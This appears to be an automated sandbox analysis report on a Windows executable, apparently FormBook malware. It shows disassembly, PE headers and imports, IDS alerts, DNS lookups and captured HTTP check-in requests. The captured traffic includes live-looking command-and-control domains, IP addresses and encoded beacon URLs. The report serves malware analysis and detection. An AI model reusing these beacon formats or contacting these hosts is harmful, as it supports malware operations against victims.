                                    jmp 00007F864CB42C74h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push edi
                                    push esi
                                    mov esi, dword ptr [esp+10h]
                                    mov ecx, dword ptr [esp+14h]
                                    mov edi, dword ptr [esp+0Ch]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F864CB42DFAh
                                    cmp edi, eax
                                    jc 00007F864CB4315Eh
                                    bt dword ptr [004C41FCh], 01h
                                    jnc 00007F864CB42DF9h
                                    rep movsb
                                    jmp 00007F864CB4310Ch
                                    cmp ecx, 00000080h
                                    jc 00007F864CB42FC4h
                                    mov eax, edi
                                    xor eax, esi
                                    test eax, 0000000Fh
                                    jne 00007F864CB42E00h
                                    bt dword ptr [004BF324h], 01h
                                    jc 00007F864CB432D0h
                                    bt dword ptr [004C41FCh], 00000000h
                                    jnc 00007F864CB42F9Dh
                                    test edi, 00000003h
                                    jne 00007F864CB42FAEh
                                    test esi, 00000003h
                                    jne 00007F864CB42F8Dh
                                    bt edi, 02h
                                    jnc 00007F864CB42DFFh
                                    mov eax, dword ptr [esi]
                                    sub ecx, 04h
                                    lea esi, dword ptr [esi+04h]
                                    mov dword ptr [edi], eax
                                    lea edi, dword ptr [edi+04h]
                                    bt edi, 03h
                                    jnc 00007F864CB42E03h
                                    movq xmm1, qword ptr [esi]
                                    sub ecx, 08h
                                    lea esi, dword ptr [esi+08h]
                                    movq qword ptr [edi], xmm1
                                    lea edi, dword ptr [edi+08h]
                                    test esi, 00000007h
                                    je 00007F864CB42E55h
                                    bt esi, 03h

                                    Rich Headers

                                    Programming Language:
                                    • [ASM] VS2013 build 21005
                                    • [ C ] VS2013 build 21005
                                    • [C++] VS2013 build 21005
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2013 UPD5 build 40629
                                    • [RES] VS2013 build 21005
                                    • [LNK] VS2013 UPD5 build 40629

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x38ed0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1010000x7134.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xc80000x38ed00x39000967b628c996fd9958f40d6528b7f29a1False0.8841445655153509data7.788354597152202IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1010000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                    RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                    RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                    RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                    RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                    RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                    RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                    RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                    RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                    RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                    RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                    RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                    RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                    RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                    RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                    RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                    RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                    RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                    RT_RCDATA0xd07b80x30168data1.0003604646440032
                                    RT_GROUP_ICON0x1009200x76dataEnglishGreat Britain0.6610169491525424
                                    RT_GROUP_ICON0x1009980x14dataEnglishGreat Britain1.25
                                    RT_GROUP_ICON0x1009ac0x14dataEnglishGreat Britain1.15
                                    RT_GROUP_ICON0x1009c00x14dataEnglishGreat Britain1.25
                                    RT_VERSION0x1009d40x10cdataEnglishGreat Britain0.5970149253731343
                                    RT_MANIFEST0x100ae00x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                    Imports

                                    DLLImport
                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                    PSAPI.DLLGetProcessMemoryInfo
                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                    UxTheme.dllIsThemeActive
                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    05/28/24-15:08:47.165398TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5103.224.212.212
                                    05/28/24-15:12:15.071010TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.5155.248.232.116
                                    05/28/24-15:09:06.832730TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.576.223.105.230
                                    05/28/24-15:09:27.255123TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.513.248.169.48
                                    05/28/24-15:11:10.766263TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.545.137.159.230
                                    05/28/24-15:10:29.038585TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.5169.239.128.46

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 28, 2024 15:08:47.159724951 CEST4971080192.168.2.5103.224.212.212
                                    May 28, 2024 15:08:47.165236950 CEST8049710103.224.212.212192.168.2.5
                                    May 28, 2024 15:08:47.165397882 CEST4971080192.168.2.5103.224.212.212
                                    May 28, 2024 15:08:47.165397882 CEST4971080192.168.2.5103.224.212.212
                                    May 28, 2024 15:08:47.171401978 CEST8049710103.224.212.212192.168.2.5
                                    May 28, 2024 15:08:47.661925077 CEST4971080192.168.2.5103.224.212.212
                                    May 28, 2024 15:08:47.669617891 CEST8049710103.224.212.212192.168.2.5
                                    May 28, 2024 15:08:47.669687986 CEST4971080192.168.2.5103.224.212.212
                                    May 28, 2024 15:09:06.826924086 CEST4971180192.168.2.576.223.105.230
                                    May 28, 2024 15:09:06.832633972 CEST804971176.223.105.230192.168.2.5
                                    May 28, 2024 15:09:06.832695961 CEST4971180192.168.2.576.223.105.230
                                    May 28, 2024 15:09:06.832730055 CEST4971180192.168.2.576.223.105.230
                                    May 28, 2024 15:09:06.838838100 CEST804971176.223.105.230192.168.2.5
                                    May 28, 2024 15:09:07.309303999 CEST804971176.223.105.230192.168.2.5
                                    May 28, 2024 15:09:07.309377909 CEST804971176.223.105.230192.168.2.5
                                    May 28, 2024 15:09:07.309436083 CEST4971180192.168.2.576.223.105.230
                                    May 28, 2024 15:09:07.309478998 CEST4971180192.168.2.576.223.105.230
                                    May 28, 2024 15:09:07.314766884 CEST804971176.223.105.230192.168.2.5
                                    May 28, 2024 15:09:27.249044895 CEST4971280192.168.2.513.248.169.48
                                    May 28, 2024 15:09:27.254051924 CEST804971213.248.169.48192.168.2.5
                                    May 28, 2024 15:09:27.255122900 CEST4971280192.168.2.513.248.169.48
                                    May 28, 2024 15:09:27.255122900 CEST4971280192.168.2.513.248.169.48
                                    May 28, 2024 15:09:27.260099888 CEST804971213.248.169.48192.168.2.5
                                    May 28, 2024 15:09:27.774974108 CEST804971213.248.169.48192.168.2.5
                                    May 28, 2024 15:09:27.775116920 CEST804971213.248.169.48192.168.2.5
                                    May 28, 2024 15:09:27.780144930 CEST4971280192.168.2.513.248.169.48
                                    May 28, 2024 15:09:28.486377954 CEST4971280192.168.2.513.248.169.48
                                    May 28, 2024 15:09:28.491462946 CEST804971213.248.169.48192.168.2.5
                                    May 28, 2024 15:09:47.772511959 CEST4971380192.168.2.5190.115.24.78
                                    May 28, 2024 15:09:47.777529955 CEST8049713190.115.24.78192.168.2.5
                                    May 28, 2024 15:09:47.777635098 CEST4971380192.168.2.5190.115.24.78
                                    May 28, 2024 15:09:47.777688026 CEST4971380192.168.2.5190.115.24.78
                                    May 28, 2024 15:09:47.782675982 CEST8049713190.115.24.78192.168.2.5
                                    May 28, 2024 15:09:48.270890951 CEST4971380192.168.2.5190.115.24.78
                                    May 28, 2024 15:09:48.276456118 CEST8049713190.115.24.78192.168.2.5
                                    May 28, 2024 15:09:48.276523113 CEST4971380192.168.2.5190.115.24.78
                                    May 28, 2024 15:10:29.032557011 CEST4971480192.168.2.5169.239.128.46
                                    May 28, 2024 15:10:29.038444996 CEST8049714169.239.128.46192.168.2.5
                                    May 28, 2024 15:10:29.038522959 CEST4971480192.168.2.5169.239.128.46
                                    May 28, 2024 15:10:29.038584948 CEST4971480192.168.2.5169.239.128.46
                                    May 28, 2024 15:10:29.043755054 CEST8049714169.239.128.46192.168.2.5
                                    May 28, 2024 15:10:29.552393913 CEST4971480192.168.2.5169.239.128.46
                                    May 28, 2024 15:10:29.603421926 CEST8049714169.239.128.46192.168.2.5
                                    May 28, 2024 15:10:29.667685986 CEST8049714169.239.128.46192.168.2.5
                                    May 28, 2024 15:10:29.667742014 CEST4971480192.168.2.5169.239.128.46

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 28, 2024 15:08:26.631820917 CEST5182453192.168.2.51.1.1.1
                                    May 28, 2024 15:08:26.787580013 CEST53518241.1.1.1192.168.2.5
                                    May 28, 2024 15:08:46.849637032 CEST5485753192.168.2.51.1.1.1
                                    May 28, 2024 15:08:47.158876896 CEST53548571.1.1.1192.168.2.5
                                    May 28, 2024 15:09:06.662199020 CEST6163653192.168.2.51.1.1.1
                                    May 28, 2024 15:09:06.826344967 CEST53616361.1.1.1192.168.2.5
                                    May 28, 2024 15:09:27.181816101 CEST5181053192.168.2.51.1.1.1
                                    May 28, 2024 15:09:27.216989994 CEST53518101.1.1.1192.168.2.5
                                    May 28, 2024 15:09:47.599453926 CEST6215553192.168.2.51.1.1.1
                                    May 28, 2024 15:09:47.770979881 CEST53621551.1.1.1192.168.2.5
                                    May 28, 2024 15:10:08.350821018 CEST6026353192.168.2.51.1.1.1
                                    May 28, 2024 15:10:08.386358023 CEST53602631.1.1.1192.168.2.5
                                    May 28, 2024 15:10:29.008150101 CEST5431853192.168.2.51.1.1.1
                                    May 28, 2024 15:10:29.031981945 CEST53543181.1.1.1192.168.2.5
                                    May 28, 2024 15:10:49.397145033 CEST5227353192.168.2.51.1.1.1
                                    May 28, 2024 15:10:49.407679081 CEST53522731.1.1.1192.168.2.5
                                    May 28, 2024 15:11:10.687024117 CEST4923653192.168.2.51.1.1.1
                                    May 28, 2024 15:11:10.760549068 CEST53492361.1.1.1192.168.2.5
                                    May 28, 2024 15:11:52.360460043 CEST6359753192.168.2.51.1.1.1
                                    May 28, 2024 15:11:52.722146988 CEST53635971.1.1.1192.168.2.5
                                    May 28, 2024 15:12:15.040112972 CEST5268253192.168.2.51.1.1.1
                                    May 28, 2024 15:12:15.055402994 CEST53526821.1.1.1192.168.2.5

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    May 28, 2024 15:08:26.631820917 CEST192.168.2.51.1.1.10xc8dbStandard query (0)www.usedata.monsterA (IP address)IN (0x0001)false
                                    May 28, 2024 15:08:46.849637032 CEST192.168.2.51.1.1.10x7efStandard query (0)www.vietcadao.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:06.662199020 CEST192.168.2.51.1.1.10xc336Standard query (0)www.micheleditrana.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:27.181816101 CEST192.168.2.51.1.1.10x44d8Standard query (0)www.aerotyneholdings.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:47.599453926 CEST192.168.2.51.1.1.10x37e1Standard query (0)www.1wxir.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:10:08.350821018 CEST192.168.2.51.1.1.10xbc82Standard query (0)www.rlyadventures.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:10:29.008150101 CEST192.168.2.51.1.1.10x6aedStandard query (0)www.myconc.proA (IP address)IN (0x0001)false
                                    May 28, 2024 15:10:49.397145033 CEST192.168.2.51.1.1.10x95d6Standard query (0)www.flickzbiz.funA (IP address)IN (0x0001)false
                                    May 28, 2024 15:11:10.687024117 CEST192.168.2.51.1.1.10x8750Standard query (0)www.openshiftstore.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:11:52.360460043 CEST192.168.2.51.1.1.10x3f77Standard query (0)www.sercettopper.comA (IP address)IN (0x0001)false
                                    May 28, 2024 15:12:15.040112972 CEST192.168.2.51.1.1.10xe720Standard query (0)www.kas-travel.comA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    May 28, 2024 15:08:26.787580013 CEST1.1.1.1192.168.2.50xc8dbName error (3)www.usedata.monsternonenoneA (IP address)IN (0x0001)false
                                    May 28, 2024 15:08:47.158876896 CEST1.1.1.1192.168.2.50x7efNo error (0)www.vietcadao.com103.224.212.212A (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:06.826344967 CEST1.1.1.1192.168.2.50xc336No error (0)www.micheleditrana.commicheleditrana.comCNAME (Canonical name)IN (0x0001)false
                                    May 28, 2024 15:09:06.826344967 CEST1.1.1.1192.168.2.50xc336No error (0)micheleditrana.com76.223.105.230A (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:06.826344967 CEST1.1.1.1192.168.2.50xc336No error (0)micheleditrana.com13.248.243.5A (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:27.216989994 CEST1.1.1.1192.168.2.50x44d8No error (0)www.aerotyneholdings.com13.248.169.48A (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:27.216989994 CEST1.1.1.1192.168.2.50x44d8No error (0)www.aerotyneholdings.com76.223.54.146A (IP address)IN (0x0001)false
                                    May 28, 2024 15:09:47.770979881 CEST1.1.1.1192.168.2.50x37e1No error (0)www.1wxir.com190.115.24.78A (IP address)IN (0x0001)false
                                    May 28, 2024 15:10:08.386358023 CEST1.1.1.1192.168.2.50xbc82Name error (3)www.rlyadventures.comnonenoneA (IP address)IN (0x0001)false
                                    May 28, 2024 15:10:29.031981945 CEST1.1.1.1192.168.2.50x6aedNo error (0)www.myconc.pro169.239.128.46A (IP address)IN (0x0001)false
                                    May 28, 2024 15:10:49.407679081 CEST1.1.1.1192.168.2.50x95d6Name error (3)www.flickzbiz.funnonenoneA (IP address)IN (0x0001)false
                                    May 28, 2024 15:11:10.760549068 CEST1.1.1.1192.168.2.50x8750No error (0)www.openshiftstore.comopenshiftstore.comCNAME (Canonical name)IN (0x0001)false
                                    May 28, 2024 15:11:10.760549068 CEST1.1.1.1192.168.2.50x8750No error (0)openshiftstore.com45.137.159.230A (IP address)IN (0x0001)false
                                    May 28, 2024 15:12:15.055402994 CEST1.1.1.1192.168.2.50xe720No error (0)www.kas-travel.com155.248.232.116A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • www.vietcadao.com
                                    • www.micheleditrana.com
                                    • www.aerotyneholdings.com
                                    • www.1wxir.com
                                    • www.myconc.pro

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549710103.224.212.212801028C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    May 28, 2024 15:08:47.165397882 CEST164OUTGET /da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert HTTP/1.1
                                    Host: www.vietcadao.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.54971176.223.105.230801028C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    May 28, 2024 15:09:06.832730055 CEST169OUTGET /da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb HTTP/1.1
                                    Host: www.micheleditrana.com
                                    Connection: close
                                    Data Raw: 00 00 00 00 00 00 00
                                    Data Ascii:
                                    May 28, 2024 15:09:07.309303999 CEST418INHTTP/1.1 301 Moved Permanently
                                    location: https://micheleditrana.com/da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb
                                    vary: Accept-Encoding
                                    server: DPS/2.0.0+sha-b4bc716
                                    x-version: b4bc716
                                    x-siteid: us-east-1
                                    set-cookie: dps_site_id=us-east-1; path=/
                                    date: Tue, 28 May 2024 13:09:07 GMT
